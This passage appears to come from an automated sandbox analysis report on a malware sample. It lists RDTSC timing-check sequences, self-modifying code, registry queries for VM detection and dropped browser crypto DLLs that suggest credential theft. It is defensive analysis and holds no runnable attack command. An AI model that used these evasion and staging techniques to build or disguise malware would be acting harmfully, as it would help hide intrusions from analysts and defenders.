Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C2A0 second address: D9C2D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0674F129ACh 0x00000008 jmp 00007F0674F129AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0674F129A6h 0x00000018 jmp 00007F0674F129B1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9C2D9 second address: D9C2DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D402 second address: D9D408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D408 second address: D9D42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F0674CEBE0Dh 0x0000000b jmp 00007F0674CEBE01h 0x00000010 jnl 00007F0674CEBDF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D36 second address: CE3D46 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0674F129A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D46 second address: CE3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D4C second address: CE3D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D55 second address: CE3D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D59 second address: CE3D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3D5D second address: CE3D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0674CEBE03h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0674CEBDF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2C60 second address: DA2C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2C66 second address: DA2C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2C6C second address: DA2C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2E15 second address: DA2E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA2E21 second address: DA2E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA46BE second address: DA46C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB34C9 second address: DB34CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB2F6F second address: DB2F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB30BA second address: DB30C4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8B72 second address: DB8B97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F0674CEBDF6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F0674CEBE02h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC70F8 second address: DC70FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC70FC second address: DC7102 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC7102 second address: DC7115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0674F129ADh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC8762 second address: DC879E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBE06h 0x00000007 jmp 00007F0674CEBDFFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0674CEBE00h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC879E second address: DC87A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC87A3 second address: DC87C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0674CEBDF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F0674CEBDF6h 0x00000013 jmp 00007F0674CEBE00h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC87C6 second address: DC87CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD0041 second address: DD0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD0046 second address: DD00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674F129B5h 0x00000009 popad 0x0000000a jmp 00007F0674F129ABh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F0674F129B5h 0x00000017 jp 00007F0674F129CCh 0x0000001d jmp 00007F0674F129B9h 0x00000022 jmp 00007F0674F129ADh 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F0674F129A6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD00B9 second address: DD00BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE825 second address: DCE851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129B9h 0x00000007 jmp 00007F0674F129AFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE851 second address: DCE86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674CEBE05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE86A second address: DCE87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE87C second address: DCE897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0674CEBDFDh 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCEA33 second address: DCEA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0674F129A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCEA3D second address: DCEA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCED12 second address: DCED18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCED18 second address: DCED2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0674CEBE01h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCED2E second address: DCED49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674F129B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCED49 second address: DCED4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCEE96 second address: DCEEC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F0674F129A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F0674F129B7h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnp 00007F0674F129A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCEEC5 second address: DCEECE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCF317 second address: DCF31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCF31E second address: DCF325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCFD82 second address: DCFD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCFD86 second address: DCFD92 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCFD92 second address: DCFD98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCFD98 second address: DCFDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCFDA4 second address: DCFDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE169E second address: DE16A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE16A4 second address: DE16B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007F0674F129A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE207 second address: DEE20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE20B second address: DEE21F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0674F129A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F0674F129A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF0B36 second address: DF0B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF0B3C second address: DF0B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0674F129A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E015CC second address: E015D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E015D0 second address: E015D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E015D6 second address: E015EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0674CEBDF6h 0x0000000a jmp 00007F0674CEBDFAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E015EA second address: E015F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E008D2 second address: E008DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0674CEBDF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E008DE second address: E008F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E008F5 second address: E008F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00D10 second address: E00D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00D15 second address: E00D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0674CEBDF6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00D23 second address: E00D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F0674F129B6h 0x0000000d pushad 0x0000000e jng 00007F0674F129A6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00FF1 second address: E00FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00FF5 second address: E01018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0674F129B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E01018 second address: E0101D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0101D second address: E01023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0117F second address: E01185 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E012D2 second address: E012D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E086F5 second address: E086F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E086F9 second address: E086FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E086FF second address: E08709 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0674CEBDFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E08709 second address: E0871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jl 00007F0674F129A8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0871D second address: E08721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E087D0 second address: E087D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E087D6 second address: E087DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E087DA second address: E0881C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 clc 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0674F129A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2D9Ah], eax 0x0000002c mov edx, dword ptr [ebp+122D3568h] 0x00000032 push DBB8533Fh 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0881C second address: E08823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B447 second address: E0B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0674F129B9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B464 second address: E0B47E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674CEBE06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B47E second address: E0B4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F0674F129A6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0674F129B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0D3F4 second address: E0D40F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0674CEBDF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0674CEBDFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0D40F second address: E0D41D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202E7 second address: 4D202F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0674CEBDFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202F7 second address: 4D2032F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F0674F129B7h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0674F129B0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2032F second address: 4D20335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20335 second address: 4D2033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2AB50 second address: D2AB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20BBF second address: 4D20C03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0674F129B4h 0x0000000c sub cx, 2CB8h 0x00000011 jmp 00007F0674F129ABh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0674F129B4h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20C03 second address: 4D20C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674CEBDFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20C20 second address: 4D20C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0674F129ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B81882 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B7F382 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D44740 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D24E3B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DA5F85 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

